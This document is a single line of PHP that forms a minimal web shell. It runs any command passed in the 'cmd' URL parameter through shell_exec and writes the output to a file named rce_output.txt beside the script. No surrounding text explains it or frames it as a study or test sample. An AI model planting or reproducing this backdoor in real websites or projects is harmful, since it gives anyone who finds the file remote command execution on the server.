<?php if(isset($_GET["cmd"])){file_put_contents(dirname(__FILE__)."/rce_output.txt",shell_exec($_GET["cmd"]));echo "";} ?>